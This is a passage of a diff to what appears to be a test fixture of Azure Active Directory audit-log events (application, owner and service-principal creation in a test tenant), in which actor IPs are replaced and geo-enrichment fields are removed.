\\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 
1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13631,25 +12461,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13663,7 +12475,7 @@ "ObjectId": "asr@testsiem.onmicrosoft.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -13787,7 +12599,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -13799,12 +12611,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036455900Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"48
4659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2
d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125218600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{
\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13833,25 +12645,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13865,7 +12659,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -14008,7 +12802,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -14020,12 +12814,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036460300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.Serv
icePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n 
\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125225400Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 
Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n 
}\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14051,25 +12845,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { 